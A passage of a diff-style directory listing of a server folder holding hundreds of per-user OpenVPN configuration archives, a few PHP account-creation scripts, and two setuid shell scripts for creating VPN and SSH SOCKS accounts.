FAM0US10495_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Oct 26 19:26 Fahne18697_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Oct 10 01:51 FatJoe11716_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Nov 27 12:23 FatJoe31469_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Aug 21 20:16 FavourStyle4249_OPENVPN.tgz +-rw-r--r-- 1 root root 3422 Aug 29 00:05 FaxXer14831_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Oct 21 17:55 FaxXer15844_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Dec 13 17:17 FaxXer26908_OPENVPN.tgz +-rw-r--r-- 1 root root 3435 Jul 6 2010 FinalX213616_OPENVPN.tgz +-rw-r--r-- 1 root root 3401 Nov 27 11:11 FireFreak26704_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Oct 15 05:21 Flex121428_OPENVPN.tgz +-rw-r--r-- 1 root root 3416 Nov 26 19:01 Flex1219530_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Oct 18 15:08 Floep19230_OPENVPN.tgz +-rw-r--r-- 1 root root 3587 Aug 22 03:57 Floep22106_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Nov 11 01:28 Freakstyler14325_OPENVPN.tgz +-rw-r--r-- 1 root root 3629 Jun 19 2010 Freakzzor30552_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Nov 14 20:32 Fruchtii4940_OPENVPN.tgz +-rw-r--r-- 1 root root 3623 Jun 19 2010 G0ETHE22157_OPENVPN.tgz +-rw-r--r-- 1 root root 3571 Dec 19 15:29 G4g4m3l23565_OPENVPN.tgz +-rw-r--r-- 1 root root 3567 Aug 30 11:36 G4g4m3l3086_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Jul 2 2010 GinTonic30066_OPENVPN.tgz +-rw-r--r-- 1 root root 3598 Dec 17 17:05 Ginal40622069_OPENVPN.tgz +-rw-r--r-- 1 root root 3404 Dec 23 15:13 HGroup29522_OPENVPN.tgz +-rw-r--r-- 1 root root 3414 Aug 22 00:17 HGroup3416_OPENVPN.tgz +-rw-r--r-- 1 root root 3391 Jul 13 10:15 Haloneros10917_OPENVPN.tgz +-rw-r--r-- 1 root root 3396 Aug 19 16:58 Haloneros4547_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Dec 6 12:38 Haloneros7849_OPENVPN.tgz +-rw-r--r-- 1 root root 3629 Jun 28 2010 Hardstyler23602_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Jul 23 19:07 Headliner16576_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Oct 11 07:05 Hellraiser15486_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Dec 
31 00:20 HonigMelone2260_OPENVPN.tgz +-rw-r--r-- 1 root root 3402 Oct 31 03:05 HonigMelone8351_OPENVPN.tgz +-rw-r--r-- 1 root root 3405 Nov 27 01:17 Iceman3299_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Dec 19 20:35 Jaksa22983_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Jul 11 20:01 Jaksa2527_OPENVPN.tgz +-rw-r--r-- 1 root root 3560 Dec 11 20:05 Jayo12320635_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Jun 30 2010 Joana24614_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Nov 26 12:12 Joana25619_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Nov 3 20:28 Jondoe28020_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Aug 30 02:45 Jondoe5523_OPENVPN.tgz +-rw-r--r-- 1 root root 3616 Jul 9 16:47 KaLLi17527_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Nov 18 01:45 Kamill9407_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Aug 17 13:08 Kasanova11582_OPENVPN.tgz +-rw-r--r-- 1 root root 3612 Jul 9 14:55 Kasanova18022_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Nov 4 16:05 Kasanova19712_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Dec 15 14:30 Kasanova22555_OPENVPN.tgz +-rw-r--r-- 1 root root 3598 Sep 17 17:54 Kasanova25732_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Oct 10 15:56 Keks1237082_OPENVPN.tgz +-rw-r--r-- 1 root root 3569 Aug 10 21:52 Keks1238205_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Dec 23 16:08 Kerber0s4146_OPENVPN.tgz +-rw-r--r-- 1 root root 3612 Aug 4 13:21 KeyserSoze18958_OPENVPN.tgz +-rw-r--r-- 1 root root 3435 Oct 14 16:03 KillerZwerg82931120_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Aug 25 20:36 Kluless30753_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Dec 29 15:05 Kolumbus15438_OPENVPN.tgz +-rw-r--r-- 1 root root 3404 Nov 15 19:14 Kucka19807504_OPENVPN.tgz +-rw-r--r-- 1 root root 3625 Jun 4 2010 LAWest26683_OPENVPN.tgz +-rw-r--r-- 1 root root 3615 Jul 6 2010 LAWest32033_OPENVPN.tgz +-rw-r--r-- 1 root root 3567 Dec 7 12:10 LiipTon17714_OPENVPN.tgz +-rw-r--r-- 1 root root 3409 Jul 29 11:58 Loader15498_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Dec 28 12:43 Loader30988_OPENVPN.tgz +-rw-r--r-- 1 root root 3614 Jun 5 
2010 Loptr20388_OPENVPN.tgz +-rw-r--r-- 1 root root 3580 Jul 20 17:23 Loptr27683_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Aug 28 00:29 Lowne11627_OPENVPN.tgz +-rw-r--r-- 1 root root 3405 Nov 11 18:34 LuckyLuke28779_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Aug 10 22:07 M000N5312_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Nov 12 20:43 Mandy13987_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Aug 4 22:43 Mandy31362_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 May 12 2010 Mandy31820_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 Sep 2 01:46 Mantis7011486_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Aug 19 00:23 MarkusSx16847_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Sep 10 16:05 Masterlord10052_OPENVPN.tgz +-rw-r--r-- 1 root root 3594 Dec 3 17:10 Maxim6745_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Dec 29 15:38 McKnad15403_OPENVPN.tgz +-rw-r--r-- 1 root root 3622 May 28 2010 McKnad23906_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Aug 29 18:10 McKnad2804_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Oct 3 00:19 McKnad9531_OPENVPN.tgz +-rw-r--r-- 1 root root 3627 Jul 11 00:59 Morgen22283_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Aug 14 23:15 Mutti17770_OPENVPN.tgz +-rw-r--r-- 1 root root 3581 Oct 5 01:40 Mutti21505_OPENVPN.tgz +-rw-r--r-- 1 root root 3610 May 12 2010 Mutti8762_OPENVPN.tgz +-rw-r--r-- 1 root root 3575 Nov 9 23:21 N3v107908_OPENVPN.tgz +-rw-r--r-- 1 root root 3599 Jan 2 11:57 N3v108540_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Jul 30 16:17 NDTBIT12101_OPENVPN.tgz +-rw-r--r-- 1 root root 3428 Oct 16 05:23 NDTBIT25949_OPENVPN.tgz +-rw-r--r-- 1 root root 3413 Sep 7 20:33 NDTBIT26205_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Jul 29 04:41 Nappo10976_OPENVPN.tgz +-rw-r--r-- 1 root root 3401 Aug 10 13:09 Nighty5510_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Jun 3 2010 Nop0x29828_OPENVPN.tgz +-rw-r--r-- 1 root root 3616 May 27 2010 Oldsql26067_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Sep 23 01:42 Pasi6512495_OPENVPN.tgz +-rw-r--r-- 1 root root 3632 Jul 10 00:12 PeteSniff26963_OPENVPN.tgz +-rw-r--r-- 1 
root root 3622 May 22 2010 Ph0nix4947_OPENVPN.tgz +-rw-r--r-- 1 root root 3635 Jun 29 2010 Phantonym17925_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Oct 26 05:43 Phiriun2823_OPENVPN.tgz +-rw-r--r-- 1 root root 3409 Dec 10 17:07 Pitbull6910648_OPENVPN.tgz +-rw-r--r-- 1 root root 3615 Jun 25 2010 Pl0051690_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Nov 28 08:39 Poseidon10572_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Aug 16 21:45 PostMort3m12175_OPENVPN.tgz +-rw-r--r-- 1 root root 3422 Sep 2 19:56 Prager28005_OPENVPN.tgz +-rw-r--r-- 1 root root 3614 Jun 21 2010 Prager2997_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Aug 24 16:50 Predat0r20106_OPENVPN.tgz +-rw-r--r-- 1 root root 3596 Jul 13 18:11 Predat0r9093_OPENVPN.tgz +-rw-r--r-- 1 root root 3620 Jun 13 2010 Profi13618_OPENVPN.tgz +-rw-r--r-- 1 root root 3623 Aug 2 01:50 Pussyrider12591_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Sep 7 02:28 Pussyrider2553_OPENVPN.tgz +-rw-r--r-- 1 root root 3621 Jul 5 2010 Pwhoam7437_OPENVPN.tgz +-rw-r--r-- 1 root root 3414 Nov 23 23:34 QuickSilver30900_OPENVPN.tgz +-rw-r--r-- 1 root root 3436 Jun 8 2010 R0MANCE30753_OPENVPN.tgz +-rw-r--r-- 1 root root 3628 Jun 29 2010 Raiden19032_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Nov 21 20:34 Rambo020232438_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Oct 4 16:22 Rambo02026184_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Jul 18 16:28 Raser8912111_OPENVPN.tgz +-rw-r--r-- 1 root root 3584 Oct 19 23:52 Ratte15435_OPENVPN.tgz +-rw-r--r-- 1 root root 3575 Oct 20 00:50 Ratte29885_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Aug 8 14:34 Revar13568_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Sep 13 20:35 Revar186_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Aug 3 00:36 Rodney29032_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Sep 13 18:11 S3t4p3x311542_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Dec 14 12:26 Sa1nt856432005_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Sep 22 02:07 SaCuSkill19539_OPENVPN.tgz +-rw-r--r-- 1 root root 3430 Jun 3 2010 Scanner22720_OPENVPN.tgz +-rw-r--r-- 1 root 
root 3405 Dec 27 17:07 Senninmod9366_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Dec 11 17:13 SilverFox12282_OPENVPN.tgz +-rw-r--r-- 1 root root 3574 Aug 29 20:49 SilverS14224_OPENVPN.tgz +-rw-r--r-- 1 root root 3431 May 15 2010 SilverS18699_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Oct 2 10:17 SilverS29996_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Nov 1 15:44 SlamD7819_OPENVPN.tgz +-rw-r--r-- 1 root root 3596 Nov 21 22:25 SleepyHollow30848_OPENVPN.tgz +-rw-r--r-- 1 root root 3574 Aug 20 05:00 Slumski15259_OPENVPN.tgz +-rw-r--r-- 1 root root 3404 Dec 11 17:30 SmileNike4939_OPENVPN.tgz +-rw-r--r-- 1 root root 3628 Jun 25 2010 SonnyBlack761_OPENVPN.tgz +-rw-r--r-- 1 root root 3414 Nov 18 20:30 Sparkasse19880_OPENVPN.tgz +-rw-r--r-- 1 root root 3427 Jun 16 2010 Standex637_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Nov 7 23:40 Star1711657_OPENVPN.tgz +-rw-r--r-- 1 root root 3407 Oct 14 20:11 Stejin14830_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Nov 29 13:23 Stejin27979_OPENVPN.tgz +-rw-r--r-- 1 root root 3621 Jun 9 2010 SunDay5117_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Sep 27 09:43 Swiss8114_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Jul 17 22:38 Sylcore21775_OPENVPN.tgz +-rw-r--r-- 1 root root 3561 Jul 16 03:23 Sylcore27550_OPENVPN.tgz +-rw-r--r-- 1 root root 3627 Jul 2 2010 Syntex31511_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Nov 4 06:13 TARTAROS15648_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Jul 18 13:57 Thnallgzt1355_OPENVPN.tgz +-rw-r--r-- 1 root root 3613 Dec 13 06:07 Thunder052_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Oct 17 17:16 Tiberius121180_OPENVPN.tgz +-rw-r--r-- 1 root root 3605 Aug 20 21:22 Tiberius25495_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Aug 29 17:10 Torbon5467_OPENVPN.tgz +-rw-r--r-- 1 root root 3597 Oct 4 01:41 Trinx15364_OPENVPN.tgz +-rw-r--r-- 1 root root 3581 Nov 22 00:54 Trinx24908_OPENVPN.tgz +-rw-r--r-- 1 root root 3593 Aug 29 21:56 Trinx31242_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Jul 11 18:39 Trinx9318_OPENVPN.tgz +-rw-r--r-- 1 root root 3408 
Jul 15 21:27 Tronic24834_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Jul 18 21:32 Tronic32029_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 May 17 2010 Tweaknap31697_OPENVPN.tgz +-rw-r--r-- 1 root root 3417 Sep 16 14:41 Tzolli11813_OPENVPN.tgz +-rw-r--r-- 1 root root 3414 Sep 17 00:26 Tzolli12805_OPENVPN.tgz +-rw-r--r-- 1 root root 3634 Jul 2 2010 Tzolli31127_OPENVPN.tgz +-rw-r--r-- 1 root root 3626 Jun 1 2010 Tzolli530_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Oct 22 01:07 Ukash31388_OPENVPN.tgz +-rw-r--r-- 1 root root 3581 Oct 5 15:59 WEEDtwo23015_OPENVPN.tgz +-rw-r--r-- 1 root root 3557 Dec 14 17:42 WEEDtwo358_OPENVPN.tgz +-rw-r--r-- 1 root root 3570 Oct 18 17:52 WalterW26039_OPENVPN.tgz +-rw-r--r-- 1 root root 3567 Dec 1 14:47 WalterW5032_OPENVPN.tgz +-rw-r--r-- 1 root root 3616 Jul 10 16:28 WeArEoNe5813_OPENVPN.tgz +-rw-r--r-- 1 root root 3632 Jul 1 2010 Weichei4520239_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Nov 21 22:43 Wursteintopf1171_OPENVPN.tgz +-rw-r--r-- 1 root root 3614 Jul 9 2010 X3N0N8545_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Nov 1 20:31 Xeral1887_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Sep 13 21:52 Zerox8831175_OPENVPN.tgz +-rw-r--r-- 1 root root 3571 Nov 7 19:55 Zorator17384_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Jul 17 18:58 Zuraaa30069_OPENVPN.tgz +-rw-r--r-- 1 root root 387 Sep 17 00:14 addSSHuser.php +-rw-r--r-- 1 root root 280 Sep 17 00:14 addVPNuser.php +-rw-r--r-- 1 root root 3574 Sep 1 00:39 adios21334_OPENVPN.tgz +-rw-r--r-- 1 root root 3610 Nov 27 13:43 adminadmin663_OPENVPN.tgz +-rw-r--r-- 1 root root 3395 Dec 24 05:38 analytics23444_OPENVPN.tgz +-rw-r--r-- 1 root root 3408 Dec 18 08:46 andreas741128201_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Sep 25 10:41 anonymius696_OPENVPN.tgz +-rw-r--r-- 1 root root 3430 Jul 6 2010 anoobis20036_OPENVPN.tgz +-rw-r--r-- 1 root root 3628 Jun 18 2010 asd12322807_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Aug 2 22:29 asd12326649_OPENVPN.tgz +-rw-r--r-- 1 root root 3414 Aug 3 18:40 asd12328521_OPENVPN.tgz 
+-rw-r--r-- 1 root root 3621 Jun 25 2010 asd1233886_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Jul 20 19:54 asdfg12345627545_OPENVPN.tgz +-rw-r--r-- 1 root root 3405 Nov 2 15:47 asdfghjkl27874_OPENVPN.tgz +-rw-r--r-- 1 root root 3564 Dec 10 07:39 awesome50_OPENVPN.tgz +-rw-r--r-- 1 root root 3589 Nov 9 15:31 b0uNz18610_OPENVPN.tgz +-rw-r--r-- 1 root root 3594 Dec 2 22:03 b111124378_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Oct 24 03:30 b14ckf1ag13016_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Dec 15 15:30 b14ckf1ag14907_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Oct 4 17:00 b7231244_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Nov 21 03:08 b72317220_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Oct 20 04:19 b72337515_OPENVPN.tgz +-rw-r--r-- 1 root root 3596 Nov 9 01:37 bLackftw19898791_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Oct 11 20:18 badboy10125461_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Jul 17 23:40 bambuss3686_OPENVPN.tgz +-rw-r--r-- 1 root root 3419 Sep 9 20:38 basics14055_OPENVPN.tgz +-rw-r--r-- 1 root root 3581 Dec 27 16:44 becks1088_OPENVPN.tgz +-rw-r--r-- 1 root root 3587 Nov 5 18:26 becks1540_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Nov 7 19:27 bergi181219604_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Aug 15 01:15 bigtwin25561_OPENVPN.tgz +-rw-r--r-- 1 root root 3397 Jul 13 12:56 blackcell12902_OPENVPN.tgz +-rw-r--r-- 1 root root 3641 Jun 11 2010 blackcell1900_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Aug 14 18:25 bloodyrain6388_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Jun 3 2010 bluballa28446_OPENVPN.tgz +-rw-r--r-- 1 root root 3584 Nov 10 20:41 bobby11515_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Aug 12 14:55 bobby15402_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Sep 17 03:28 bobby1638_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Dec 11 14:06 bobby7804_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Oct 18 18:37 cafe116337_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Aug 14 21:49 cardercarder18567_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Jul 7 2010 cardercarder21402_OPENVPN.tgz 
+-rw-r--r-- 1 root root 3593 Dec 12 19:16 cardercarder31297_OPENVPN.tgz +-rw-r--r-- 1 root root 3588 Sep 14 07:54 cardercarder6893_OPENVPN.tgz +-rw-r--r-- 1 root root 3585 Oct 28 02:05 cardercarder8070_OPENVPN.tgz +-rw-r--r-- 1 root root 3416 Oct 15 01:29 carlos3914_OPENVPN.tgz +-rw-r--r-- 1 root root 3564 Nov 23 05:29 cayenne10018_OPENVPN.tgz +-rw-r--r-- 1 root root 3605 Jul 21 17:29 checka1220438_OPENVPN.tgz +-rw-r--r-- 1 root root 3404 Dec 28 14:48 chessy33331564_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Sep 29 16:28 chessy3333215_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Nov 26 12:28 chiller133713287_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Dec 29 11:22 chiller13378063_OPENVPN.tgz +-rw-r--r-- 1 root root 3409 Sep 10 00:34 chip998558_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Dec 7 09:16 conviction28712_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Oct 28 01:20 conviction6444_OPENVPN.tgz +-rw-r--r-- 1 root root 3623 Jul 8 2010 coolio13949_OPENVPN.tgz +-rw-r--r-- 1 root root 3575 Sep 5 22:43 crack9164_OPENVPN.tgz +-rwsr-sr-x 1 root root 700 May 9 2010 createSSHsocks.sh +-rwsr-sr-x 1 root root 518 May 11 2010 createVPN.sh +-rw-r--r-- 1 root root 3412 Jul 17 20:49 crypt012465_OPENVPN.tgz +-rw-r--r-- 1 root root 3569 Oct 27 16:38 cryptus4764_OPENVPN.tgz +-rw-r--r-- 1 root root 3598 Sep 11 19:15 cunit15618415_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Aug 11 14:44 cunit15619893_OPENVPN.tgz +-rw-r--r-- 1 root root 3593 Nov 9 23:03 cunit15624106_OPENVPN.tgz +-rw-r--r-- 1 root root 3565 Jul 23 15:14 d0ne0ne32695_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 Dec 30 22:11 darkt0wn15874_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Nov 26 19:37 darkt0wn3662_OPENVPN.tgz +-rw-r--r-- 1 root root 3423 Jun 11 2010 dasemih10582_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Aug 9 03:01 denniswolf15380_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Sep 8 17:06 denniswolf975_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 May 31 2010 desaster30502_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Jul 10 15:33 
det0x10826_OPENVPN.tgz +-rw-r--r-- 1 root root 3614 Jun 6 2010 det0x25144_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 May 16 2010 det0x6693_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Dec 5 20:40 dex9030410_OPENVPN.tgz +-rw-r--r-- 1 root root 3405 Aug 29 19:38 dinara3242_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Aug 18 17:42 docscanner11883_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Dec 10 20:19 docscanner15891_OPENVPN.tgz +-rw-r--r-- 1 root root 3612 Oct 24 17:48 docscanner6161_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Oct 22 14:14 dome250310063_OPENVPN.tgz +-rw-r--r-- 1 root root 3407 Aug 24 16:08 donkey17577_OPENVPN.tgz +-rw-r--r-- 1 root root 3594 Nov 24 19:26 dpgc201011939_OPENVPN.tgz +-rw-r--r-- 1 root root 3422 Nov 7 23:02 dreckz7739_OPENVPN.tgz +-rw-r--r-- 1 root root 3605 Nov 22 18:25 drhandel18818_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Nov 27 11:04 drweed7100_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Nov 19 01:43 duden16363_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Oct 27 22:52 dudex20927_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Sep 12 18:50 dudex29255_OPENVPN.tgz +-rw-r--r-- 1 root root 3439 Jun 1 2010 e5e1llo30858_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Nov 4 23:11 eater15817_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Oct 27 19:21 eddinc12916_OPENVPN.tgz +-rw-r--r-- 1 root root 3581 Jan 3 15:05 elektro27327_OPENVPN.tgz +-rw-r--r-- 1 root root 3560 Nov 30 15:30 elektro6996_OPENVPN.tgz +-rw-r--r-- 1 root root 3585 Jul 15 00:05 elit327890_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Nov 18 12:14 epoepo25324_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Jul 14 20:26 f1resp1n9199_OPENVPN.tgz +-rw-r--r-- 1 root root 3589 Nov 8 01:59 finnq10545_OPENVPN.tgz +-rw-r--r-- 1 root root 3426 Oct 23 21:19 fluxay4913_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Sep 4 01:34 forza12423_OPENVPN.tgz +-rw-r--r-- 1 root root 3599 Aug 24 21:30 fragezeichen14241_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Oct 5 16:36 fragezeichen3542_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Nov 26 23:39 
frankylo18404_OPENVPN.tgz +-rw-r--r-- 1 root root 3423 Nov 6 03:30 freaky11488_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Nov 29 12:11 freshestman14998_OPENVPN.tgz +-rw-r--r-- 1 root root 3416 Sep 7 02:44 freshestman20055_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Oct 15 15:11 freshestman28233_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Nov 16 01:27 fuckdawn12660_OPENVPN.tgz +-rw-r--r-- 1 root root 3417 Jul 20 01:30 galaxi12741_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Jul 19 22:52 galaxi15585_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Oct 2 23:53 galaxi18086_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Oct 30 02:40 gehtes5036_OPENVPN.tgz +-rw-r--r-- 1 root root 3408 Oct 28 05:45 genetik1015054_OPENVPN.tgz +-rw-r--r-- 1 root root 3606 Jun 8 2010 godfella23150_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Nov 3 00:53 ground22054_OPENVPN.tgz +-rw-r--r-- 1 root root 3577 Sep 22 02:09 groundy30694_OPENVPN.tgz +-rw-r--r-- 1 root root 3423 Aug 4 00:04 h2d2e218599_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Aug 6 19:39 h3l0x29397_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Jun 28 2010 h3l0x3097_OPENVPN.tgz +-rw-r--r-- 1 root root 3612 May 27 2010 h3l0x31602_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Oct 16 21:20 h3l0x32259_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Sep 6 23:03 h3l0x4320_OPENVPN.tgz +-rw-r--r-- 1 root root 3416 Dec 6 13:04 habadu5745_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Sep 22 11:39 hackbart231851_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Nov 13 22:57 hackbart24778_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 Oct 31 23:11 hackoman8853_OPENVPN.tgz +-rw-r--r-- 1 root root 3592 Aug 18 15:47 haddemann1235295_OPENVPN.tgz +-rw-r--r-- 1 root root 3593 Jul 12 15:15 hallo12322143_OPENVPN.tgz +-rw-r--r-- 1 root root 3416 Sep 4 01:51 hallo50505023476_OPENVPN.tgz +-rw-r--r-- 1 root root 3596 Nov 28 20:53 hans200020336_OPENVPN.tgz +-rw-r--r-- 1 root root 3407 Dec 4 19:35 hanshans12322721_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Sep 18 18:05 hanswurst4277_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Nov 
20 14:42 hanswurst961_OPENVPN.tgz +-rw-r--r-- 1 root root 3615 Nov 4 02:00 haooosii22019_OPENVPN.tgz +-rw-r--r-- 1 root root 3628 Jul 8 2010 hasenp0wer1224_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Jul 12 16:53 hexst4tic15575_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Nov 6 17:30 hexst4tic20328_OPENVPN.tgz +-rw-r--r-- 1 root root 3413 Sep 25 12:59 hexst4tic22131_OPENVPN.tgz +-rw-r--r-- 1 root root 3391 Aug 23 16:21 hexst4tic24446_OPENVPN.tgz +-rw-r--r-- 1 root root 3635 Jun 9 2010 hexst4tic31381_OPENVPN.tgz +-rw-r--r-- 1 root root 3396 Jul 12 02:43 hexst4tic7086_OPENVPN.tgz +-rw-r--r-- 1 root root 3396 Oct 26 02:49 heyhey12325893_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Jan 2 23:36 hi31757_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Dec 8 16:47 hung23046577_OPENVPN.tgz +-rw-r--r-- 1 root root 3404 Oct 20 00:23 hushbaits3027_OPENVPN.tgz +-rw-r--r-- 1 root root 3407 Dec 1 09:21 hushbaits8016_OPENVPN.tgz +-rw-r--r-- 1 root root 3437 Jul 2 2010 ibrains20948_OPENVPN.tgz +-rw-r--r-- 1 root root 3564 Nov 27 22:57 illegal9593_OPENVPN.tgz +-rw-r--r-- 1 root root 3 May 11 2010 index.htm +-rw-r--r-- 1 root root 2 Sep 17 03:05 index.html +-rw-r--r-- 1 root root 3634 Jul 11 16:09 inexcussus16748_OPENVPN.tgz +-rw-r--r-- 1 root root 3574 Jul 25 20:18 j9ker8731371_OPENVPN.tgz +-rw-r--r-- 1 root root 3567 Oct 30 17:44 jack12330743_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Aug 5 00:16 jiansa17539_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Nov 25 20:03 johan12328730_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Jun 18 2010 johny3288_OPENVPN.tgz +-rw-r--r-- 1 root root 3584 Aug 20 15:20 jokereloaded3875_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 May 11 2010 